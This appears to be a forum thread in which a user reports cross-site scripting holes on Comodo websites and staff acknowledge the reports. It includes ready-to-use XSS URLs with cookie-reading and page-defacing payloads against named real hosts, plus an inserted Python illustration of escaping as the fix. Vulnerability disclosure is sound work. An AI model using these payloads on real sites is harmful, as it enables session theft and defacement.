Comodo website vulnerable to XSS [REPORT]

Report:

"><script>alert("XSS")</script>

http://www.comodo.com/hackerproof/order2.html?term="><script>alert("www.Insecurity.Ro")</script>

XSS Deface : (picture, alerts, music, etc…)

http://www.comodo.com/hackerproof/order2.html?term=%22%3E%3C/title%3E%3Cscript%3Ealert(%22XSS%20Comodo%22)%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html{background-color:%20Black;}%3C/style%3E'%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2020px;%22%3E%3Cimg%20src=%22http://img257.imageshack.us/img257/3733/77822687.png%22%20style=%22height:%20400px;%20width:%20600px;%22%20alt=%22By%20Sony%22%3E%3Cbr%3Eby%20Sony%3Ciframe%20src%20=http://www.youtube.com/watch?v=_qwBAZ64VYM%22%20width=%220%22%20height=%220%22%20%5C%3E%3C/div%3E

http://jp.comodo.com/buy/index.php?main_page=discount_coupon&action=lookup

<script>alert(document.cookie)</script>

https://secure.instantssl.com/products/login

username :

"><script>alert(document.cookie)</script>

password:

"><script>alert(document.cookie)</script>

(now doesn't work)

The Best Regards!

Lady Sony
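The payloads in the report all follow one pattern: the `term` value starts with `"` to close a double-quoted attribute, then `>` to close the tag, then `<script>`; the longer deface variant also closes an open `<title>`. The block below is an added illustration, not code from the report and not Comodo's own page: a hypothetical order page (the template is an assumption about how such a page might echo the parameter) rendered once without escaping and once with context-aware HTML escaping, with the report's own payloads fed through both and a tokenizer used to see whether a `<script>` element actually appears.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Payloads quoted in the report above: the first breaks out of a double-quoted
# attribute, the second (URL-encoded in the report) also closes an open <title>.
PAYLOAD_ATTR = '"><script>alert("XSS")</script>'
REPORT_URL = ("http://www.comodo.com/hackerproof/order2.html"
              "?term=%22%3E%3C/title%3E%3Cscript%3Ealert(%22XSS%20Comodo%22)%3C/script%3E")


def term_from_url(url):
    """Return the `term` query parameter as the server sees it after URL decoding."""
    return parse_qs(urlsplit(url).query).get("term", [""])[0]


def render_vulnerable(term):
    """Hypothetical order page (an assumption, not Comodo's code) that echoes
    the raw search term into the <title> and into a value="..." attribute."""
    return ("<html><head><title>Order: " + term + "</title></head>"
            '<body><input name="term" value="' + term + '"></body></html>')


def render_hardened(term):
    """Same page with HTML escaping applied at the output point. quote=True
    encodes " and ' as well as < > &, so the value can neither close the
    <title> element nor terminate the double-quoted attribute."""
    safe = html.escape(term, quote=True)
    return ("<html><head><title>Order: " + safe + "</title></head>"
            '<body><input name="term" value="' + safe + '"></body></html>')


class _Elements(HTMLParser):
    """Collects start tags and their attributes, roughly as a browser tokenizer would."""
    def __init__(self):
        super().__init__()
        self.tags = []
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs[tag] = dict(attrs)


def element_names(page):
    """Start tags found in the page; an injected <script> shows up here."""
    p = _Elements()
    p.feed(page)
    p.close()
    return p.tags


def input_value(page):
    """Decoded value attribute of the <input>; shows that escaping keeps the data intact."""
    p = _Elements()
    p.feed(page)
    p.close()
    return p.attrs.get("input", {}).get("value")


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        for term in (PAYLOAD_ATTR, term_from_url(REPORT_URL)):
            tags = element_names(render(term))
            print(f"{label:10} script injected: {'script' in tags}  tags={tags}")
```

Two details matter for this class of bug. The escaping has to happen at the output point for every context the value lands in (the `</title>` variant works precisely because a `<title>` echo is easy to forget), and `quote=True` is not optional for attribute contexts, since every payload in the report begins with the `"` that closes the attribute. In the hardened output the `value` attribute still decodes to the original search term, so nothing is lost for the user; it just can no longer become markup.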

Hi Lady Sony,

Thanks for reporting, they will investigate ASAP.

Ok

Hello my boys! :-*

Today I was bored and I found a new XSS in comodo.com

… removed by admin …

The Best Regards!

Lady Sony

Thanks for reporting, we’ll investigate the issue.

ok

Hi Lady Sony,

Thank you for your heads-up. The XSS is being fixed as we speak by the web dev team. I've removed the code from your post, so we don't have any issues.

Thank you :)

Ok)

More…

Another XSS…

http://www.comodo.com/M<code removed by mod>

You can see and fix it.

So… I found an error in MySQL (this can be used for full hacking), but… I lost the link.
If I find it, I'll write only in a PM.

The Best Regards!

Lady Sony

http://www.hackerguardian.com/<code removed by mod>

etc…

A lot of XSS…

Hi again,

Thanks for reporting, will notify admins again.
Ronny